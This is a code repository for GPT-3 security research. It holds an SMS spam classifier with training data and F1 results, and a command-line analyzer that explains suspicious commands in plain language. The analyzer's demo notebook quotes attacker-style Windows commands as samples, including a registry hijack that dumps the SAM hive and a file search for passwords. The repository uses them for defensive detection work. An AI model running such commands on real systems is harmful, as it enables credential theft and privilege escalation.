├── requirements.txt
├── spam_detector
├── spam_data
│ ├── results_mean_f1_plot.pdf
│ └── experiment_1
│ │ ├── results_f1_plot.pdf
│ │ ├── results_gpt3_finetune.csv
│ │ ├── results_gpt3_fewshot.csv
│ │ ├── train_2.csv
│ │ ├── results_randomforest.csv
│ │ ├── results_logisticregression.csv
│ │ ├── train_8.csv
│ │ ├── train_32.csv
│ │ ├── test.csv
│ │ └── train_512.csv
├── README.md
├── spam_demo.ipynb
├── sklearn_models.py
├── gpt3_models.py
└── spam_detector.py
├── command_analyzer
├── cmd_data
│ ├── data_cmd_tag_and_gold_reference_desc.json.zip
│ └── results_data_cmd_tag_and_gold_reference_desc.json_scores.csv
├── README.md
├── command_demo.ipynb
├── similarity.py
├── prompt_data.py
└── command_analyzer.py
├── README.md
└── LICENSE
/requirements.txt:
--------------------------------------------------------------------------------
1 | numpy==1.19.4
2 | pandas==1.3.3
3 | scikit-learn==0.20.3
4 | nltk==3.4
5 | matplotlib==3.5.1
6 | openai==0.20.0
--------------------------------------------------------------------------------
/spam_detector/spam_data/results_mean_f1_plot.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/spam_detector/spam_data/results_mean_f1_plot.pdf
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_f1_plot.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/spam_detector/spam_data/experiment_1/results_f1_plot.pdf
--------------------------------------------------------------------------------
/command_analyzer/cmd_data/data_cmd_tag_and_gold_reference_desc.json.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/command_analyzer/cmd_data/data_cmd_tag_and_gold_reference_desc.json.zip
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_gpt3_finetune.csv:
--------------------------------------------------------------------------------
1 | train_size,test_precision,test_recall,test_f1-score,test_support
2 | 512,0.9926339285714285,0.9921875,0.9922847939851616,256
3 | 1024,1.0,1.0,1.0,256
4 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_gpt3_fewshot.csv:
--------------------------------------------------------------------------------
1 | train_size,test_precision,test_recall,test_f1-score,test_support
2 | 2,0.9446328364624965,0.9140625,0.9220379203515667,256
3 | 8,0.9773846557853911,0.9765625,0.9768543819554849,256
4 | 32,0.9801682692307693,0.9765625,0.9773792613636364,256
5 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/train_2.csv:
--------------------------------------------------------------------------------
1 | label text
2 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also?
3 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply
4 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_randomforest.csv:
--------------------------------------------------------------------------------
1 | train_size,test_precision,test_recall,test_f1-score,test_support
2 | 2,0.890686274509804,0.875,0.8203605710066454,256
3 | 8,0.8925623739919355,0.89453125,0.8651752077831287,256
4 | 32,0.8260624562324931,0.85546875,0.8365655304963634,256
5 | 512,0.9723597935267857,0.97265625,0.9724764993116503,256
6 | 1024,0.9723597935267857,0.97265625,0.9724764993116503,256
7 |
--------------------------------------------------------------------------------
/command_analyzer/cmd_data/results_data_cmd_tag_and_gold_reference_desc.json_scores.csv:
--------------------------------------------------------------------------------
1 | ,ngram_bleu_generated_description_score,ngram_bleu_baseline_description_score,semantic_similarity_generated_description_score,semantic_similarity_baseline_description_score
2 | mean,0.20269268573332166,0.18891764397772917,0.9193342014745949,0.9046513387951954
3 | std,0.10771449055627129,0.10937139147679167,0.02980726068908328,0.04784594717568072
4 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_logisticregression.csv:
--------------------------------------------------------------------------------
1 | train_size,test_precision,test_recall,test_f1-score,test_support
2 | 2,0.8352011308909528,0.6953125,0.7423407521724168,256
3 | 8,0.8814179345275345,0.80078125,0.8268168000650431,256
4 | 32,0.9171266417572463,0.83203125,0.8551778036153037,256
5 | 512,0.9608743134355384,0.95703125,0.9583006471367891,256
6 | 1024,0.9682624260622887,0.96484375,0.9658823476573728,256
7 |
--------------------------------------------------------------------------------
/command_analyzer/README.md:
--------------------------------------------------------------------------------
1 | # Command analyzer
2 |
3 | Invoke the following command to translate a command line into a natural language description.
4 |
5 | ```
6 | python command_analyzer.py --cmd="command line" --tags=="comma seperated tags"
7 | ```
8 |
9 |
10 | Invoke the following command to evaluate our back-translation approaches.
11 |
12 | Unzip the cmd_data/results_data_cmd_tag_and_gold_reference_desc.json.zip file with a password which is this repository name.
13 |
14 | ```
15 | python command_analyzer.py --run_type=evaluate_approaches --path_output_json="cmd_data/results_data_cmd_tag_and_gold_reference_desc.json" --path_input_json="cmd_data/data_cmd_tag_and_gold_reference_desc.json"
16 | ```
17 |
18 |
19 | Demo examples are available in the [notebook](https://github.com/sophos/gpt3-and-cybersecurity/blob/main/command_analyzer/command_demo.ipynb).
20 |
21 | # Dataset
22 |
23 | cmd_data folder provides a dataset which includes command lines, tags and reference descriptions.
24 |
--------------------------------------------------------------------------------
/spam_detector/README.md:
--------------------------------------------------------------------------------
1 | # Spam detector
2 |
3 | Invoke the following command to identify a message as spam or ham.
4 |
5 | ```
6 | python spam_detector.py --message="test message"
7 | ```
8 |
9 | The above command generates a prompt using two in-context samples from [a training dataset](./spam_data/experiment_1/train_2.csv). The default training file can be changed with its --path_train_data option.
10 |
11 |
12 |
13 | Invoke the following command to evaluate spam detection approaches which include traditional ML models and novel GPT-3 models.
14 |
15 | ```
16 | python spam_detector.py --run_type=evaluate_approaches --path_data_folder=spam_data --num_experiments=5
17 | ```
18 |
19 |
20 | Demo examples are available in the [notebook](https://github.com/sophos/gpt3-and-cybersecurity/blob/main/spam_detector/spam_demo.ipynb).
21 |
22 | # Spam dataset
23 |
24 | spam_data folder provides training and test datasets which were randomly sampled from a spam datast, The [spam data](./spam_data/SMSSpamCollection) is from [UCI SMS Spam collection data set](https://archive.ics.uci.edu/ml/datasets/sms+spam+collection).
25 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/train_8.csv:
--------------------------------------------------------------------------------
1 | label text
2 | Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply
3 | Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!!
4 | Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16
5 | Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s
6 | Ham Just sent it. So what type of food do you like?
7 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply
8 | Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY
9 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also?
10 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Sophos AI GPT-3 for Cybersecurity Repository
2 |
3 | A key lesson of recent deep learning successes is that as we scale neural networks, they get better, and sometimes in game-changing ways.
4 | This repo provides two applications which demonstrate how GPT-3 opens new vistas for cybersecurity.
5 |
6 | ## How do I get started?
7 |
8 | There are two use cases for spam detection and command analysis.
9 | As the code in this repo uses OpenAI API, set the OPENAI_API_KEY enviroment variable as your api key.
10 | Refer to the OpenAI documentation in https://beta.openai.com/docs/introduction.
11 |
12 | ### Spam detector
13 | Spam detector demonstrates how to identify spam messages using GPT-3 few-shot learning or fine-tuning.
14 |
15 | Change directory to spam_detector folder and follow the [instructions](./spam_detector/README.md).
16 |
17 |
18 | ### Command analyzer
19 | Command analyzer shows how to analyzer complex command lines using GPT-3 few-shot learning.
20 |
21 | Change directory to command_analyzer folder and follow the [instructions](./command_analyzer/README.md).
22 |
23 |
24 | ## How do I cite GPT-3 for Cybersecurity?
25 |
26 | *Questions, ideas, feedback appreciated, please email younghoo.lee@sophos.com*
27 |
28 | @misc{Lee2022,
29 | author = {Lee, Younghoo},
30 | title = {GPT-3 for Cybersecurity},
31 | year = {2022},
32 | publisher = {GitHub},
33 | journal = {GitHub repository},
34 | howpublished = {\url{https://github.com/sophos-ai/gpt3-cybersecurity/}}
35 | }
36 |
--------------------------------------------------------------------------------
/spam_detector/spam_demo.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "code",
5 | "execution_count": 1,
6 | "metadata": {},
7 | "outputs": [],
8 | "source": [
9 | "import os\n",
10 | "import logging\n",
11 | "\n",
12 | "os.environ[\"OPENAI_API_KEY\"] = \"YOUR_API_KEY\"\n",
13 | "\n",
14 | "from spam_detector import classify_message\n",
15 | "\n",
16 | "logging.disable(logging.CRITICAL)\n",
17 | "\n",
18 | "def test_message(message, label):\n",
19 | " model_label = classify_message(\n",
20 | " message, \n",
21 | " path_train_data=\"spam_data/experiment_1/train_2.csv\", \n",
22 | " num_samples_in_prompt=2\n",
23 | " )\n",
24 | " print(\"label:{}, model_label:{}\".format(label, model_label))\n"
25 | ]
26 | },
27 | {
28 | "cell_type": "code",
29 | "execution_count": null,
30 | "metadata": {},
31 | "outputs": [],
32 | "source": [
33 | "#update the \"YOUR_API_KEY\" with your key value."
34 | ]
35 | },
36 | {
37 | "cell_type": "code",
38 | "execution_count": 2,
39 | "metadata": {},
40 | "outputs": [
41 | {
42 | "name": "stdout",
43 | "output_type": "stream",
44 | "text": [
45 | "label:Spam, model_label:Spam\n"
46 | ]
47 | }
48 | ],
49 | "source": [
50 | "message = \"Reply with your name and address and YOU WILL RECEIVE BY POST a weeks completely free accommodation at various global locations www.phb1.com ph:08700435505150p\"\n",
51 | "\n",
52 | "test_message(message, label=\"Spam\")"
53 | ]
54 | },
55 | {
56 | "cell_type": "code",
57 | "execution_count": 3,
58 | "metadata": {},
59 | "outputs": [
60 | {
61 | "name": "stdout",
62 | "output_type": "stream",
63 | "text": [
64 | "label:Spam, model_label:Spam\n"
65 | ]
66 | }
67 | ],
68 | "source": [
69 | "message = \"Bloomberg -Message center +447797706009 Why wait? Apply for your future http://careers. bloomberg.com\"\n",
70 | "\n",
71 | "test_message(message, label=\"Spam\")"
72 | ]
73 | },
74 | {
75 | "cell_type": "code",
76 | "execution_count": 4,
77 | "metadata": {},
78 | "outputs": [
79 | {
80 | "name": "stdout",
81 | "output_type": "stream",
82 | "text": [
83 | "label:Ham, model_label:Ham\n"
84 | ]
85 | }
86 | ],
87 | "source": [
88 | "message = \"And you! Will expect you whenever you text! Hope all goes well tomo\"\n",
89 | "\n",
90 | "test_message(message, label=\"Ham\")"
91 | ]
92 | },
93 | {
94 | "cell_type": "code",
95 | "execution_count": 5,
96 | "metadata": {},
97 | "outputs": [
98 | {
99 | "name": "stdout",
100 | "output_type": "stream",
101 | "text": [
102 | "label:Ham, model_label:Ham\n"
103 | ]
104 | }
105 | ],
106 | "source": [
107 | "message = \"I'm okay. Chasing the dream. What's good. What are you doing next.\"\n",
108 | "\n",
109 | "test_message(message, label=\"Ham\")"
110 | ]
111 | }
112 | ],
113 | "metadata": {
114 | "kernelspec": {
115 | "display_name": "Python 3.7.3 ('py37')",
116 | "language": "python",
117 | "name": "python3"
118 | },
119 | "language_info": {
120 | "codemirror_mode": {
121 | "name": "ipython",
122 | "version": 3
123 | },
124 | "file_extension": ".py",
125 | "mimetype": "text/x-python",
126 | "name": "python",
127 | "nbconvert_exporter": "python",
128 | "pygments_lexer": "ipython3",
129 | "version": "3.7.3"
130 | },
131 | "orig_nbformat": 4,
132 | "vscode": {
133 | "interpreter": {
134 | "hash": "76a25e87fb8c87bd2343da81e5596777f4c7870efa99cccebacc9b427c0a0b42"
135 | }
136 | }
137 | },
138 | "nbformat": 4,
139 | "nbformat_minor": 2
140 | }
141 |
--------------------------------------------------------------------------------
/spam_detector/sklearn_models.py:
--------------------------------------------------------------------------------
1 | import pandas as pd
2 | import logging
3 | from collections import Counter
4 | from sklearn.feature_extraction.text import TfidfVectorizer
5 | from sklearn.ensemble import RandomForestClassifier
6 | from sklearn.linear_model import LogisticRegression
7 | from sklearn.metrics import classification_report
8 |
9 |
10 | logging.basicConfig(format="%(asctime)s %(message)s",
11 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO)
12 | logger = logging.getLogger(__name__)
13 |
14 |
15 | def extract_features(
16 | df,
17 | column_text="text",
18 | column_label="label",
19 | positive_label="Spam",
20 | max_features=1000,
21 | vectorizer=None,
22 | ):
23 | """
24 | extract ML features.
25 | :param df: the data frame for input data
26 | :param column_text: the column for text
27 | :param column_label: the column for label
28 | :param positive_label: the value for positive label
29 | :param max_features: the max number of features
30 | :param vectorizer: vectorizer for test data
31 | """
32 | if vectorizer is None:
33 | vectorizer = TfidfVectorizer(max_features=max_features)
34 | X = vectorizer.fit_transform(df[column_text])
35 | else:
36 | X = vectorizer.transform(df[column_text])
37 | y = df[column_label] == positive_label
38 | return X, y, vectorizer
39 |
40 |
41 | def train_sk_model(
42 | X_train,
43 | X_test,
44 | y_train,
45 | y_test,
46 | model_name="RandomForest"
47 | ):
48 | if model_name == "RandomForest":
49 | model = RandomForestClassifier()
50 | elif model_name == "LogisticRegression":
51 | model = LogisticRegression()
52 | model.fit(X_train, y_train)
53 |
54 | y_pred = model.predict(X_test)
55 | return classification_report(y_test, y_pred, output_dict=True)
56 |
57 |
58 | def evaluate_sklearn_model(
59 | path_train_data,
60 | path_test_data,
61 | model_name="RandomForest",
62 | max_features=1000,
63 | column_text="text",
64 | column_label="label",
65 | positive_label="Spam"
66 | ):
67 | """
68 | evaluate sklearn models with training and test datasets.
69 | :param path_train_data: file path for training dataset
70 | :param path_test_data: file path for test dataset
71 | :param model_name: model name
72 | :param max_features: max number of ML features
73 | :param column_text: the column for text
74 | :param column_label: the column for label
75 | :param positive_label: the value for positive label
76 | """
77 | df_train = pd.read_csv(path_train_data, sep="\t")
78 | logger.info("path_train_data:{}, df_train.shape:{}".format(
79 | path_train_data, df_train.shape))
80 |
81 | X_train, y_train, vectorizer = extract_features(
82 | df_train, max_features=max_features,
83 | column_text=column_text, column_label=column_label,
84 | positive_label=positive_label)
85 | logger.info("X_train.shape:{}, y_train.shape:{}".format(
86 | X_train.shape, y_train.shape))
87 | logger.info("y_train.label.count:{}".format(Counter(y_train)))
88 |
89 | df_test = pd.read_csv(path_test_data, sep="\t")
90 | logger.info("path_test_data:{}, df_test.shape:{}".format(
91 | path_test_data, df_test.shape))
92 |
93 | X_test, y_test, _vectorizer = extract_features(
94 | df_test, max_features=max_features, vectorizer=vectorizer,
95 | column_text=column_text, column_label=column_label,
96 | positive_label=positive_label)
97 | logger.info("X_test.shape:{}, y_test.shape:{}".format(
98 | X_test.shape, y_test.shape))
99 | logger.info("y_test.label.count:{}".format(Counter(y_test)))
100 |
101 | return train_sk_model(X_train, X_test, y_train, y_test, model_name=model_name)
102 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/train_32.csv:
--------------------------------------------------------------------------------
1 | label text
2 | Ham Am in gobi arts college
3 | Spam Congrats! Nokia 3650 video camera phone is your Call 09066382422 Calls cost 150ppm Ave call 3mins vary from mobiles 16+ Close 300603 post BCM4284 Ldn WC1N3XX
4 | Ham Sorry * was at the grocers.
5 | Ham Its ok..come to my home it vl nice to meet and v can chat..
6 | Ham Rose needs water, season needs change, poet needs imagination..My phone needs ur sms and i need ur lovely frndship forever....
7 | Spam 83039 62735=£450 UK Break AccommodationVouchers terms & conditions apply. 2 claim you mustprovide your claim number which is 15541
8 | Ham Did he say how fantastic I am by any chance, or anything need a bigger life lift as losing the will 2 live, do you think I would be the first person 2 die from N V Q?
9 | Ham How's my loverboy doing ? What does he do that keeps him from coming to his Queen, hmmm ? Doesn't he ache to speak to me ? Miss me desparately ?
10 | Spam You will be receiving this week's Triple Echo ringtone shortly. Enjoy it!
11 | Ham Solve d Case : A Man Was Found Murdered On <DECIMAL> . <#> AfterNoon. 1,His wife called Police. 2,Police questioned everyone. 3,Wife: Sir,I was sleeping, when the murder took place. 4.Co
12 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222.
13 | Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY
14 | Spam Congratulations ur awarded either a yrs supply of CDs from Virgin Records or a Mystery Gift GUARANTEED Call 09061104283 Ts&Cs www.smsco.net £1.50pm approx 3mins
15 | Spam Bored of speed dating? Try SPEEDCHAT, txt SPEEDCHAT to 80155, if you don't like em txt SWAP and get a new chatter! Chat80155 POBox36504W45WQ 150p/msg rcd 16
16 | Ham Just sent it. So what type of food do you like?
17 | Spam ree entry in 2 a weekly comp for a chance to win an ipod. Txt POD to 80182 to get entry (std txt rate) T&C's apply 08452810073 for details 18+
18 | Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply
19 | Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!!
20 | Ham Mm you ask him to come its enough :-)
21 | Spam Your 2004 account for 07XXXXXXXXX shows 786 unredeemed points. To claim call 08719181259 Identifier code: XXXXX Expires 26.03.05
22 | Ham Today i'm not workin but not free oso... Gee... Thgt u workin at ur fren's shop ?
23 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply
24 | Ham Thanx. Yup we coming back on sun. Finish dinner going back 2 hotel now. Time flies, we're tog 4 exactly a mth today. Hope we'll haf many more mths to come...
25 | Spam 88066 FROM 88066 LOST 3POUND HELP
26 | Ham I need... Coz i never go before
27 | Spam Hi, this is Mandy Sullivan calling from HOTMIX FM...you are chosen to receive £5000.00 in our Easter Prize draw.....Please telephone 09041940223 to claim before 29/03/05 or your prize will be transfer
28 | Spam todays vodafone numbers ending with 0089(my last four digits) are selected to received a £350 award. If your number matches please call 09063442151 to claim your £350 award
29 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also?
30 | Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s
31 | Ham Or I guess <#> min
32 | Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16
33 | Spam Dear Matthew please call 09063440451 from a landline, your complimentary 4*Lux Tenerife holiday or £1000 CASH await collection. ppm150 SAE T&Cs Box334 SK38XH.
34 |
--------------------------------------------------------------------------------
/command_analyzer/command_demo.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "code",
5 | "execution_count": 1,
6 | "metadata": {},
7 | "outputs": [],
8 | "source": [
9 | "import os\n",
10 | "import logging\n",
11 | "\n",
12 | "os.environ[\"OPENAI_API_KEY\"] = \"YOUR_API_KEY\"\n",
13 | "\n",
14 | "from command_analyzer import generate_description\n",
15 | "\n",
16 | "logging.disable(logging.CRITICAL)\n",
17 | "\n",
18 | "def command_to_description(command, tags):\n",
19 | " description, baseline_description, candidates = generate_description(command, tags)\n",
20 | " print(\"description:\\n{}\".format(description))\n",
21 | " print(\"baseline_description:\\n{}\".format(baseline_description)) \n"
22 | ]
23 | },
24 | {
25 | "cell_type": "code",
26 | "execution_count": 2,
27 | "metadata": {},
28 | "outputs": [],
29 | "source": [
30 | "#update the \"YOUR_API_KEY\" with your key value."
31 | ]
32 | },
33 | {
34 | "cell_type": "code",
35 | "execution_count": 3,
36 | "metadata": {},
37 | "outputs": [
38 | {
39 | "name": "stdout",
40 | "output_type": "stream",
41 | "text": [
42 | "description:\n",
43 | "The command will create a registry value \"command\" under the registry key \"hkcu\\software\\classes\\ms-settings\\shell\\open\" and set its default value to \"reg.exe save hklm\\sam C:\\Users\\Pcs\\AppData\\Local\\Temp\\sam.save\". This default value will then be executed when the user clicks on the Windows \"Settings\" icon. The command will add a value under the \"reg.exe\" key in the \"open\\command\" directory of the \"ms-settings\" key in the \"HKCU\" hive. The value data is \"reg.exe save hklm\\sam C:\\Users\\Pcs\\AppData\\Local\\Temp\\sam.save\".\n",
44 | "baseline_description:\n",
45 | "The command will attempt to dump the SAM registry hive to the specified path.\n"
46 | ]
47 | }
48 | ],
49 | "source": [
50 | "command = \"reg.exe add hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command /ve /d \\\"reg.exe save hklm\\\\sam C:\\\\Users\\\\Pcs\\\\AppData\\\\Local\\\\Temp\\\\sam.save\\\" /f\"\n",
51 | "tags = \"win_pc_reg_dump_sam,win_pc_suspicious_reg_open_command\"\n",
52 | "command_to_description(command, tags)\n"
53 | ]
54 | },
55 | {
56 | "cell_type": "code",
57 | "execution_count": 4,
58 | "metadata": {},
59 | "outputs": [
60 | {
61 | "name": "stdout",
62 | "output_type": "stream",
63 | "text": [
64 | "description:\n",
65 | "The command will echo the \"dir\" command to a file called \"execute.bat\", write the command to the \"execute.bat\" file, and then execute the \"execute.bat\" file. This command will list the contents of the directory \"C:\\Users\\admin\\OneDrive ADMINISTRATORS INC\" and write the output to \"\\\\127.0.0.1\\C$\\__output\". The \"dir\" command will be executed as the \"Local System\" account.\n",
66 | "baseline_description:\n",
67 | "The command will list the contents of the \"C:\\Users\\admin\\OneDrive ADMINISTRATORS INC\" directory and save the output to \"C:\\__output\". It will be executed as the LocalSystem account.\n"
68 | ]
69 | }
70 | ],
71 | "source": [
72 | "command = \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /Q /c echo dir \\\"C:\\\\Users\\\\admin\\\\OneDrive ADMINISTRATORS INC\\\" ^> \\\\\\\\127.0.0.1\\\\C$\\\\__output 2^>^&1 > C:\\\\WINDOWS\\\\TEMP\\\\execute.bat & C:\\\\WINDOWS\\\\system32\\\\cmd.exe /Q /c C:\\\\WINDOWS\\\\TEMP\\\\execute.bat & del C:\\\\WINDOWS\\\\TEMP\\\\execute.bat\"\n",
73 | "tags = \"win_local_system_owner_account_discovery\"\n",
74 | "command_to_description(command, tags)"
75 | ]
76 | },
77 | {
78 | "cell_type": "code",
79 | "execution_count": 5,
80 | "metadata": {},
81 | "outputs": [
82 | {
83 | "name": "stdout",
84 | "output_type": "stream",
85 | "text": [
86 | "description:\n",
87 | "The command will recursively list all files in the \"C:\\Users\\Pcs\\Desktop\" directory and all subdirectories, and will search the output for files containing the word \"password\".\n",
88 | "baseline_description:\n",
89 | "The command will list all files and directories on the target machine and pipe the output to a search for the string \"password\".\n"
90 | ]
91 | }
92 | ],
93 | "source": [
94 | "command = \"\\\"cmd.exe\\\" dir /b /s \\\"C:\\\\Users\\\\Pcs\\\\Desktop\\\\*.*\\\" | findstr /i \\\"password\\\"\"\n",
95 | "tags = \"win_pc_suspicious_dir,win_suspicious_findstr\"\n",
96 | "command_to_description(command, tags)"
97 | ]
98 | }
99 | ],
100 | "metadata": {
101 | "kernelspec": {
102 | "display_name": "Python 3.7.3 ('py37')",
103 | "language": "python",
104 | "name": "python3"
105 | },
106 | "language_info": {
107 | "codemirror_mode": {
108 | "name": "ipython",
109 | "version": 3
110 | },
111 | "file_extension": ".py",
112 | "mimetype": "text/x-python",
113 | "name": "python",
114 | "nbconvert_exporter": "python",
115 | "pygments_lexer": "ipython3",
116 | "version": "3.7.3"
117 | },
118 | "orig_nbformat": 4,
119 | "vscode": {
120 | "interpreter": {
121 | "hash": "76a25e87fb8c87bd2343da81e5596777f4c7870efa99cccebacc9b427c0a0b42"
122 | }
123 | }
124 | },
125 | "nbformat": 4,
126 | "nbformat_minor": 2
127 | }
128 |
--------------------------------------------------------------------------------
/command_analyzer/similarity.py:
--------------------------------------------------------------------------------
1 | import numpy as np
2 | import logging
3 | from nltk.translate.bleu_score import sentence_bleu
4 | from openai.embeddings_utils import get_embeddings
5 |
6 |
7 | logging.basicConfig(format="%(asctime)s %(message)s",
8 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO)
9 | logger = logging.getLogger(__name__)
10 |
11 |
12 | def get_embedding_similarity_score_list(
13 | cmd,
14 | tags,
15 | items,
16 | max_cmd_len=200,
17 | weight_desc_score=0.3,
18 | weight_tags_score=0.2,
19 | engine="text-similarity-babbage-001"
20 | ):
21 | """
22 | returns a weighted score from cosine similarity scores.
23 | :param cmd: command line data
24 | :param tags: tags data
25 | :param items: contains a list of (desc, generated_cmd)
26 | :param max_cmd_len: max length of command line data
27 | :param weight_desc_score: the weight for description score
28 | :param weight_tags_score: the weight for tags score
29 | :param engine: engine for similarity score
30 | """
31 | code_items = [cmd[:max_cmd_len]] + [item[1] for item in items]
32 | if weight_tags_score>0:
33 | code_items += [tags]
34 | code_matrix = get_embeddings(code_items, engine=engine)
35 | if weight_tags_score>0:
36 | tags_emb = code_matrix[-1]
37 |
38 | if weight_desc_score>0:
39 | desc_items = [item[0] for item in items]
40 | desc_matrix = get_embeddings(desc_items, engine=engine)
41 |
42 | reference_code_emb = code_matrix[0]
43 | score_list = []
44 | for ix in range(len(items)):
45 | desc, generated_cmd = items[ix]
46 | #get a cosine similarity score between two embeddings vectors
47 | code_score = np.dot(reference_code_emb, code_matrix[1+ix])
48 | #get a weighted score from 3 scores
49 | if weight_desc_score>0 and weight_tags_score>0:
50 | desc_score = np.dot(reference_code_emb, desc_matrix[ix])
51 | tags_score = np.dot(tags_emb, desc_matrix[ix])
52 | score = (1-weight_desc_score-weight_tags_score) * code_score + weight_desc_score * desc_score + weight_tags_score * tags_score
53 | elif weight_desc_score>0:
54 | desc_score = np.dot(reference_code_emb, desc_matrix[ix])
55 | tags_score = .0
56 | score = (1-weight_desc_score) * code_score + weight_desc_score * desc_score
57 | elif weight_tags_score>0:
58 | desc_score = .0
59 | tags_score = np.dot(reference_code_emb, desc_matrix[ix])
60 | score = (1-weight_tags_score) * code_score + weight_tags_score * tags_score
61 | else:
62 | desc_score = .0
63 | tags_score = .0
64 | score = code_score
65 | logger.info("===\n{:.3f}, {:.3f}, {:.3f}, {:.3f}".format(
66 | score, code_score, desc_score, tags_score))
67 | logger.info(desc)
68 | logger.info(generated_cmd)
69 | score_list.append((score, code_score, desc_score, tags_score, cmd, generated_cmd, desc))
70 | return score_list
71 |
72 |
73 | def get_sorted_similarity_score_list(
74 | cmd,
75 | tags,
76 | items,
77 | engine="text-similarity-babbage-001",
78 | weight_desc_score=0.3,
79 | weight_tags_score=0.2,
80 | max_cmd_len=200
81 | ):
82 | """
83 | return a list of description list sorted similarity scores.
84 | :param cmd: command line data
85 | :param tags: tags data
86 | :param items: contains a list of (desc, generated_cmd)
87 | :param engine: engine for similarity score
88 | :param weight_desc_score: the weight for description score
89 | :param weight_tags_score: the weight for tags score
90 | :param max_cmd_len: max length of command line data
91 | """
92 | score_list = get_embedding_similarity_score_list(
93 | cmd, tags, items,
94 | weight_desc_score=weight_desc_score,
95 | weight_tags_score=weight_tags_score,
96 | engine=engine, max_cmd_len=max_cmd_len)
97 |
98 | return sorted(score_list, key=lambda x:x[0], reverse=True)
99 |
100 |
101 | def get_ngrams_bleu_similarity_score(
102 | reference,
103 | candidate_list
104 | ):
105 | """
106 | returns similarity scores using sentence_bleu.
107 | :param reference: reference text
108 | :param candidate_list: a list of candidates
109 | """
110 | score_list = []
111 | for candidate in candidate_list:
112 | reference_tokens = [reference.split()]
113 | candidate_tokens = candidate.split()
114 | score = sentence_bleu(reference_tokens, candidate_tokens,
115 | weights=(0.5, 0.5, 0., 0.))
116 | score_list.append(score)
117 | return score_list
118 |
119 |
120 | def get_semantic_similarity_score(
121 | reference,
122 | candidate_list,
123 | engine="text-similarity-babbage-001"
124 | ):
125 | """
126 | return similarity scores using cosine similarity with gpt3 embeddings.
127 | :param reference: reference text
128 | :param candidate_list: a list of candidates
129 | :param engine: engine for similarity score
130 | """
131 | items = [reference] + candidate_list
132 | embeddings_list = get_embeddings(items, engine=engine)
133 | reference_emb = embeddings_list[0]
134 | score_list = []
135 | for candidate_embeddings in embeddings_list[1:]:
136 | #get a cosine similarity score
137 | score = np.dot(reference_emb, candidate_embeddings)
138 | score_list.append(score)
139 | return score_list
140 |
--------------------------------------------------------------------------------
/command_analyzer/prompt_data.py:
--------------------------------------------------------------------------------
1 | import os
2 | import time
3 | import logging
4 | import openai
5 |
6 |
7 | openai.api_key = os.getenv("OPENAI_API_KEY")
8 |
9 | logging.getLogger("openai").setLevel(logging.ERROR)
10 | logging.basicConfig(format="%(asctime)s %(message)s",
11 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO)
12 | logger = logging.getLogger(__name__)
13 |
14 |
15 | STR_PREFIX_CMD = '## Command\n'
16 | STR_PREFIX_TAGS = '## Tags\n'
17 |
18 | STR_PREFIX_DESC = '## Description\nThe command'
19 | STR_PREFIX_ABOVE_DESC = '## Description\nThe above command'
20 | STR_PREFIX_BELOW_DESC = '## Description\nThe below command'
21 |
22 | STR_PREFIX_FIRST_DESC = '## Description1\nThe command'
23 | STR_PREFIX_SECOND_DESC = '## Description2\nThe command'
24 | STR_PREFIX_COMBINED_DESC = 'The Description1 and Description2 describe the Command, combine them and complete the Description.\n'
25 |
26 |
